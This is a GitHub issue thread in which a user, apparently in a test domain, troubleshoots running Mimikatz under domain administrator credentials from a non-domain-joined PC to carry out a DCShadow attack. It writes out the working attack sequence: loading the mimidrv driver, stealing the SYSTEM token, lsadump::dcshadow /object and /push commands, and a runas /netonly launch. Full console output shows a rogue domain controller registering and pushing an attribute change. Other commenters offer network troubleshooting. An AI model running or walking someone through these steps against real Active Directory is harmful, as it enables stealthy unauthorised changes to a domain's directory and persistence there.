Can't find way to run Mimikatz in context of a domain administrator on non-domain-joined PC for DC Shadow attack #423
Comments
Uhh you try runas already?
On Thu, Mar 16, 2023 at 15:06 rick-engle wrote:

I'm looking for a way to launch mimikatz within the context of an AD domain administrator (DA) so that if I use the token::whoami command it shows me running in that context:

mimikatz # token::whoami
- Process Token : {0;000003e7} 2 D 1443633 TARGETDOMAIN\ADMINUSER S-1-5-18 (04g,30p) Primary
- Thread Token : no token

The attack PC does have line of sight to a Domain Controller, but I can't figure out how I can start mimikatz in that DA context.
Is there a way to do this?
Thanks.
I did try that but unfortunately I get this error:
Hi @gentilkiwi, that command works but doesn't seem to change the user context. If I use this it launches mimikatz OK, but the whoami still shows me in the context of the local admin account I signed into the Windows PC with:
Ok that is good to know. I put everything together for my DC Shadow attack (which I can get working fine on a domain-joined PC) but the first mimikatz session making an attribute change never receives the sync from session #2 making the push. I did turn off the Windows firewalls on this Windows 10 PC as I did on other domain-joined machines where this worked. I guessed at the parameters I needed for the lsadump::dcshadow /object and lsadump::dcshadow /push commands to enable them to find the domain controller. This attack PC DOES have line of sight to the domain controller:

Mimikatz session #1

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( ***@***.*** )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( ***@***.*** )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # !+
[+] 'mimidrv' service already registered
[*] 'mimidrv' service already started

mimikatz # !processtoken
Token from process 0 to process 0
- from 0 will take SYSTEM token
- to 0 will take all 'cmd' and 'mimikatz' process
Token from 4/System
- to 4976/cmd.exe
- to 5704/mimikatz.exe
- to 2844/mimikatz.exe

mimikatz # lsadump::dcshadow /object:jeffl /dc:DC1.mydomain.com /attribute:Description /value="My new cool description is swell!"
** Domain Info **
Domain: DC=toondom,DC=com
Configuration: CN=Configuration,DC=toondom,DC=com
Schema: CN=Schema,CN=Configuration,DC=toondom,DC=com
dsServiceName:
,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=toondom,DC=com
domainControllerFunctionality: 6 ( WIN2012R2 )
highestCommittedUSN: 635132
** Server Info **
Server: DC1.mydomain.com
InstanceId : {52021f09-72f2-4471-9114-9e582b9c071c}
InvocationId: {254a564c-26b5-45cc-a01a-4774f80bab1a}
Fake Server (not already registered): ATTACKER-EXT.mydomain.com
** Attributes checking **
#0: Description
** Objects **
#0: jeffl
DN:CN=JeffL,CN=Users,DC=toondom,DC=com
Description (2.5.4.13-d rev 1):
My new cool description is swell!
(4d00790020006e0065007700200063006f006f006c0020006400650073006300720069007000740069006f006e0020006900730020007300770065006c006c0021000000)
** Starting server **
BindString[0]: ncacn_ip_tcp:ATTACKER-EXT[53196]
RPC bind registered
RPC Server is waiting!
== Press Control+C to stop ==

Mimikatz session #2

Launch with:
runas /netonly /user:mydomain.com\badadmin "C:\Attackfolder\x64\mimikatz.exe"

mimikatz # token::whoami
- Process Token : {0;00630804} 2 L 6490326 ATTACKER-EXT\georgej S-1-5-21-3967830162-2019074872-1635380170-1000 (12g,05p) Primary
- Thread Token : no token

mimikatz # lsadump::dcshadow /push
ERROR kull_m_net_getDC ; DsGetDcName: 1355

mimikatz # lsadump::dcshadow /push /dc:DC1.mydomain.com
** Domain Info **
Domain: DC=toondom,DC=com
Configuration: CN=Configuration,DC=toondom,DC=com
Schema: CN=Schema,CN=Configuration,DC=toondom,DC=com
dsServiceName:
,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=toondom,DC=com
domainControllerFunctionality: 6 ( WIN2012R2 )
highestCommittedUSN: 635133
** Server Info **
Server: DC1.mydomain.com
InstanceId : {52021f09-72f2-4471-9114-9e582b9c071c}
InvocationId: {254a564c-26b5-45cc-a01a-4774f80bab1a}
Fake Server (not already registered): ATTACKER-EXT.mydomain.com
** Performing Registration **
** Performing Push **
Syncing DC=toondom,DC=com
Sync Done
** Performing Unregistration **

Are you in a virtualized environment or attached to multiple networks?
Also, have you dumped dns traffic to see what's going on?
This seems like you are having network issues reading through this, because I can't imagine this not being related to some type of network issue.